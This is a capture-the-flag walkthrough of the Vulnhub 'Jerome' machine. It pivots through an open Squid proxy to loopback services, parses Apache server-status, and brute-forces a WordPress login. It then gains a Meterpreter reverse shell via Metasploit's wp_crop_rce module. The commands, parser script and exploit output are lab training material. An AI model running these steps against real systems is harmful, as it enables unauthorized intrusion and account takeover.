
Vulnhub: Jerome Machine, Detailed Walkthrough

Date: 2022-12-31 13:33:22

Jerome

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:fe:db:5e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.219  08:00:27:7f:57:f4      1      60  PCS Systemtechnik GmbH                                                   


Kali's netdiscover identifies the target host's IP address as 192.168.56.219.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-30 22:38 EST
Nmap scan report for 192.168.56.219
Host is up (0.000072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
8080/tcp open  http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:7F:57:F4 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

The full-port Nmap scan shows exactly one open TCP port on the target, 8080, running a Squid 3.5.27 HTTP proxy. No web server is exposed directly, so the proxy itself has to be the way in.

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://192.168.56.219:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 3592 -b 400
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   400
[+] Exclude Length:          3592
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/30 22:43:58 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220324 / 220561 (99.89%)===============================================================
2022/12/30 22:47:22 Finished
===============================================================

The scan aimed directly at port 8080 finds nothing, because Squid is a forward proxy rather than a web server: every path returns the same 3592-byte "requested URL could not be retrieved" error page. The target's port 8080 therefore has to be used as an HTTP proxy, and the requests must be aimed at services the proxy can reach, starting with the loopback interface. Requesting http://127.0.0.1 through the proxy returns a blank page whose source contains only a comment:

<!- Move along -->

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.56.219:8080
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/30 22:53:32 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 200) [Size: 7775]
Progress: 218971 / 220561 (99.28%)===============================================================
2022/12/30 22:54:20 Finished
=============================================================

A /server-status page is reachable. Apache's mod_status is normally restricted to localhost, but since requests relayed by Squid originate from the box itself, that restriction no longer applies.

Apache Server Status for 127.0.0.1 (via 127.0.0.1)

Server Version: Apache/2.4.29 (Ubuntu)
Server MPM: prefork
Server Built: 2018-10-10T18:59:25

Current Time: Saturday, 31-Dec-2022 04:56:59 CET
Restart Time: Saturday, 31-Dec-2022 04:21:17 CET
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 35 minutes 42 seconds
Server load: 0.98 0.54 0.23
Total accesses: 795722 - Total Traffic: 541.3 MB
CPU Usage: u28.69 s21.97 cu0 cs0 - 2.37% CPU load
371 requests/sec - 258.8 kB/second - 713 B/request
10 requests currently being processed, 5 idle workers

KWKKK__KKK_K..._K._.............................................
................................................................
......................

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv	PID	Acc	M	CPU 	SS	Req	Conn	Child	Slot	Client	Protocol	VHost	Request
0-0	613	62/51818/51818	K 	3.53	0	0	43.5	35.25	35.25 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.txt HTTP/1.1
1-0	614	4/52040/52040	W 	3.53	0	0	2.8	35.41	35.41 	127.0.0.1	http/1.1	127.0.1.1:80	GET /server-status HTTP/1.1
2-0	992	77/38457/52167	K 	2.69	0	0	54.0	26.21	35.50 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.html HTTP/1.1
3-0	993	44/38020/51573	K 	2.66	0	0	30.8	25.91	35.09 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.html HTTP/1.1
4-0	994	97/38376/51921	K 	2.69	0	0	68.1	26.16	35.33 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.php HTTP/1.1
5-0	963	0/52228/52228	_ 	3.55	0	0	0.0	35.53	35.53 	127.0.0.1	http/1.1	127.0.1.1:80	GET /200602byauthor HTTP/1.1
6-0	977	0/51752/51752	_ 	3.51	0	0	0.0	35.20	35.20 	127.0.0.1	http/1.1	127.0.1.1:80	GET /004076.js HTTP/1.1
7-0	995	31/37502/38513	K 	2.64	0	0	21.8	25.56	26.25 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditech.php HTTP/1.1
8-0	996	4/36869/49899	K 	2.60	0	0	2.8	25.14	33.96 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.js HTTP/1.1
9-0	980	81/50597/50597	K 	3.47	0	0	56.7	34.43	34.43 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.txt HTTP/1.1
10-0	981	0/50967/50967	_ 	3.49	0	0	0.0	34.68	34.68 	127.0.0.1	http/1.1	127.0.1.1:80	GET /comment-post.txt HTTP/1.1
11-0	982	8/51049/51049	K 	3.48	0	0	5.6	34.74	34.74 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.sh HTTP/1.1
12-0	-	0/0/12323	. 	0.78	154	0	0.0	0.00	8.34 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
13-0	-	0/0/12020	. 	0.74	149	0	0.0	0.00	8.14 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
14-0	-	0/0/910	. 	0.05	201	0	0.0	0.00	0.61 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
15-0	986	0/50290/50290	_ 	3.43	0	0	0.0	34.22	34.22 	127.0.0.1	http/1.1	127.0.1.1:80	GET /movingcompanies.html HTTP/1.1
16-0	987	64/50761/50761	K 	3.49	0	0	45.0	34.54	34.54 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.sh HTTP/1.1
17-0	-	0/0/12020	. 	0.75	152	0	0.0	0.00	8.14 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
18-0	989	0/50751/50751	_ 	3.47	0	0	0.0	34.54	34.54 	127.0.0.1	http/1.1	127.0.1.1:80	GET /32676.sh HTTP/1.1
19-0	-	0/0/1718	. 	0.10	198	0	0.0	0.00	1.16 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
20-0	-	0/0/405	. 	0.01	203	0	0.0	0.00	0.27 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0

The VHost column of the scoreboard reveals a second listener on the loopback interface, 127.0.1.1:1337, besides the one on port 80. The Request column also shows which files are being requested on port 80; the extensions seen there (.php, .html, .txt, .sh, .js) are reused in the next scan.
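The scoreboard above is just a table, and the useful part of it (the VHost and Request columns) can be pulled out mechanically. The following is an added example for this writeup, not code from the original post: it parses the mod_status worker table, either as the tab-separated text shown above or as the raw HTML, and lists the distinct host:port values Apache is serving, which is how the 1337 listener was spotted. SAMPLE is constructed from a few of the captured rows; the proxy address in fetch_via_proxy is the target's Squid from the scan.

```python
"""Pull backend vhosts and request paths out of an Apache mod_status page.

Added example (not from the original writeup). Works on the tab-separated
text rendering of /server-status or on the raw HTML table.
"""
import re
import urllib.request
from typing import Dict, Iterable, List

# Column headers exactly as mod_status prints them in the worker table.
COLUMNS = ["Srv", "PID", "Acc", "M", "CPU", "SS", "Req", "Conn",
           "Child", "Slot", "Client", "Protocol", "VHost", "Request"]

# Constructed sample: a subset of the scoreboard rows captured from the target.
SAMPLE = (
    "Srv\tPID\tAcc\tM\tCPU\tSS\tReq\tConn\tChild\tSlot\tClient\tProtocol\tVHost\tRequest\n"
    "1-0\t614\t4/52040/52040\tW\t3.53\t0\t0\t2.8\t35.41\t35.41\t127.0.0.1\thttp/1.1\t127.0.1.1:80\tGET /server-status HTTP/1.1\n"
    "4-0\t994\t97/38376/51921\tK\t2.69\t0\t0\t68.1\t26.16\t35.33\t127.0.0.1\thttp/1.1\t127.0.1.1:80\tGET /fsbo_news.php HTTP/1.1\n"
    "12-0\t-\t0/0/12323\t.\t0.78\t154\t0\t0.0\t0.00\t8.34\t::1\thttp/1.1\t127.0.1.1:1337\tOPTIONS * HTTP/1.0\n"
    "20-0\t-\t0/0/405\t.\t0.01\t203\t0\t0.0\t0.00\t0.27\t::1\thttp/1.1\t127.0.1.1:1337\tOPTIONS * HTTP/1.0\n"
)


def html_table_to_text(html: str) -> str:
    """Flatten mod_status HTML table rows into tab-separated lines."""
    lines = []
    for row in re.findall(r"<tr[^>]*>(.*?)</tr>", html, flags=re.S | re.I):
        cells = re.findall(r"<t[dh][^>]*>(.*?)</t[dh]>", row, flags=re.S | re.I)
        lines.append("\t".join(re.sub(r"<[^>]+>", "", c) for c in cells))
    return "\n".join(lines)


def parse_scoreboard(text: str) -> List[Dict[str, str]]:
    """One dict per worker row; the header row and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("\t")]
        if len(fields) != len(COLUMNS) or fields[0] == COLUMNS[0]:
            continue
        rows.append(dict(zip(COLUMNS, fields)))
    return rows


def backend_vhosts(rows: Iterable[Dict[str, str]]) -> List[str]:
    """Distinct host:port values Apache serves, as seen by its own workers."""
    return sorted({r["VHost"] for r in rows if r["VHost"] not in ("", "-")})


def requested_paths(rows: Iterable[Dict[str, str]]) -> List[str]:
    """Distinct request targets (a seed wordlist for the hidden vhost)."""
    paths = set()
    for r in rows:
        parts = r["Request"].split()
        if len(parts) == 3 and parts[1].startswith("/"):
            paths.add(parts[1])
    return sorted(paths)


def fetch_via_proxy(url: str, proxy: str = "http://192.168.56.219:8080") -> str:
    """Fetch url through the target's Squid so the request originates from loopback.

    Network call against the lab target; the offline test does not exercise it.
    """
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    with opener.open(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    rows = parse_scoreboard(SAMPLE)
    print("vhosts:", backend_vhosts(rows))   # ['127.0.1.1:1337', '127.0.1.1:80']
    print("paths: ", requested_paths(rows))
```

Against the live box the same functions run on `fetch_via_proxy("http://127.0.0.1/server-status")` after passing the result through `html_table_to_text`; `mod_status` also accepts `?refresh=N` to keep re-rendering, which is handy while waiting for a slot to show an interesting vhost.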

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080 -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:1337
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.56.219:8080
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2022/12/30 23:00:25 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 290]
/.html                (Status: 403) [Size: 291]
/index.html           (Status: 200) [Size: 0]
/wordpress            (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
Progress: 8355 / 1323366 (0.63%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/30 23:00:28 Finished
===============================================================
                                                                   

Gobuster finds a /wordpress directory on port 1337.

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:02:16 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: MISS from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] root
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jerome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:02:19 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.059 KB
[+] Data Received: 143.36 KB
[+] Memory used: 224.133 MB
[+] Elapsed time: 00:00:02

wpscan identifies two usernames, root and jerome. Next, try to brute-force their passwords:

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U root -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:03:22 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: MISS from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
^Cying root / sayyes Time: 00:17:23 <                                             > (145935 / 14344392)  1.01%  ETA: 28:12:23
[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.> (145940 / 14344392)  1.01%  ETA: 28:12:30
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:20:49 2022
[+] Requests Done: 146086
[+] Cached Requests: 29
[+] Data Sent: 57.559 MB
[+] Data Received: 608.27 MB
[+] Memory used: 266.812 MB
[+] Elapsed time: 00:17:27

Scan Aborted: Canceled by User
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U jerome -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:21:03 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: HIT from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - jerome / jerome                                                                                                  
Trying jerome / jerome Time: 00:00:02 <                                              > (420 / 14344812)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerome, Password: jerome

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:21:10 2022
[+] Requests Done: 586
[+] Cached Requests: 4
[+] Data Sent: 224.011 KB
[+] Data Received: 1.85 MB
[+] Memory used: 264.891 MB
[+] Elapsed time: 00:00:06

Only jerome's password (jerome) was recovered; the run against root was abandoned after about 1% of rockyou.txt.

Logging in as jerome shows that the account is not an administrator, so the usual theme-editor route to code execution is out. Following other writeups, the Metasploit wp_crop_rce module is used instead: it abuses the image-crop path traversal in WordPress 5.0 (CVE-2019-8942 and CVE-2019-8943) to include an uploaded "image" as a theme file, and only needs an author-level account:

msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   PASSWORD   jerome                      yes       The WordPress password to authenticate with
   Proxies    http://192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/w
                                                    iki/Using-Metasploit
   RPORT      1337                        yes       The target port (TCP)
   SSL        false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                  yes       The base path to the wordpress application
   THEME_DIR                              no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                      yes       The WordPress username to authenticate with
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > set Proxies http:192.168.56.219:8080
Proxies => http:192.168.56.219:8080
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP handler on 192.168.56.206:5555 
[-] http: The proxy returned a non-OK response
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[-] The host (192.168.56.219:8080) was unreachable.
[-] Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   PASSWORD   jerome                    yes       The WordPress password to authenticate with
   Proxies    http:192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                  i/Using-Metasploit
   RPORT      1337                      yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   THEME_DIR                            no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                    yes       The WordPress username to authenticate with
   VHOST                                no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) >  set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   PASSWORD   jerome                    yes       The WordPress password to authenticate with
   Proxies    http:192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                  i/Using-Metasploit
   RPORT      1337                      yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   THEME_DIR                            no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                    yes       The WordPress username to authenticate with
   VHOST                                no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > 
msf6 exploit(multi/http/wp_crop_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 192.168.56.219
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.219:42732) at 2022-12-30 23:43:58 -0500
shell[*] Attempting to clean up files...

meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)

Two details matter here. The Proxies option must be written in Metasploit's own type:host:port form, http:192.168.56.219:8080, not as a URL; with http://192.168.56.219:8080 the module fails with "The proxy returned a non-OK response". RHOSTS must also be 127.0.0.1 rather than localhost: with localhost the module ran once against 0.0.0.1 and then failed to fetch the theme through the proxy, and only the explicit loopback address produced a session.

The session runs as jerome, who is a member of the sudo group; the WordPress password is tried for sudo below and does not work.

meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
which python
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

jerome@jerome:/var/www/html/wordpress$ ls
ls
KwBppbQNVC.php  wp-activate.php       wp-content         wp-mail.php
SPBLmthcHr.php  wp-admin              wp-cron.php        wp-settings.php
WpnKElxqGj.php  wp-blog-header.php    wp-includes        wp-signup.php
